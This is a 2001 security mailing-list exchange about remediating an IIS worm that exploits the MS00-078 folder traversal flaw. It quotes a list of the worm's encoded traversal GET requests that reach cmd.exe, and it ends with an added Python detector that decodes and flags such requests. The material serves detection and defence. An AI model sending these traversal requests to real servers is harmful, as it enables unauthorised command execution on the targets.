From: BJ Bellamy (bellamybj lycos.com)
Date: Tue Sep 18 2001 - 11:52:23 CDT
Has anyone gotten an idea about how to deal with this worm?
According to CERT, (http://www.cert.org/current/current_activity.html#port80)
it appears to exploit MS00-078
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-078.asp
Microsoft Security Bulletin (MS00-078)
Patch Available for Web Server Folder Traversal Vulnerability
But how do you remediate it?
Del readme.exe, root.exe, cmd.exe not in system32 and reboot?
Not to mention applying the patch!
Thanks to all,
BJ
---
-------------------------------------
Do not attribute to malice what can be better attributed to incompetence.
-------------------------------------

On Tue, 18 Sep 2001 09:30:29 Marc Fossi wrote:
>Here are the entries you should see in your IDS logs.
>
>Marc Fossi, MCSE
>SecurityFocus
>www.securityfocus.com
>
>
>GET /scripts/root.exe?/c+dir
>GET /MSADC/root.exe?/c+dir
>GET /c/winnt/system32/cmd.exe?/c+dir
>GET /d/winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
>GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
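The request lines quoted above differ mainly in how the path separator is encoded, so a log check has to decode before it matches. The following is an added example, not part of the original thread: it normalises a few of those request lines and labels them. The function names, the finding labels and the byte-folding model of the lenient decoder are assumptions made for illustration.

```python
from urllib.parse import unquote_to_bytes

SHELLS = {"cmd.exe", "root.exe"}  # file names requested in the quoted list

def fold_overlong(raw: bytes) -> bytes:
    # Assumption: model the lenient decoder by folding a 0xC0/0xC1 lead byte and
    # the byte after it into one 7-bit character (%c0%af -> '/', %c1%9c -> '\').
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(raw[i])
            i += 1
    return bytes(out)

def normalize(path: str, max_rounds: int = 5) -> str:
    # Percent-decode until nothing changes, so %255c -> %5c -> '\' is unwound.
    data = path.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = fold_overlong(unquote_to_bytes(data))
        if decoded == data:
            break
        data = decoded
    return data.decode("latin-1").replace("\\", "/").lower()

def classify(request_line: str) -> list:
    # Returns finding labels for one "METHOD URI [VERSION]" log line.
    parts = request_line.split()
    if len(parts) < 2:
        return []
    raw = parts[1].partition("?")[0]
    segs = normalize(raw).split("/")
    findings = []
    if ".." in segs:
        plain = ".." in raw.replace("\\", "/").split("/")
        findings.append("traversal" if plain else "encoded-traversal")
    if segs[-1] in SHELLS:
        findings.append("shell-binary")
    return findings

SAMPLES = [  # first three are from the quoted list; the last is constructed
    "GET /scripts/root.exe?/c+dir",
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "GET /index.html HTTP/1.0",
]
if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), line)
```
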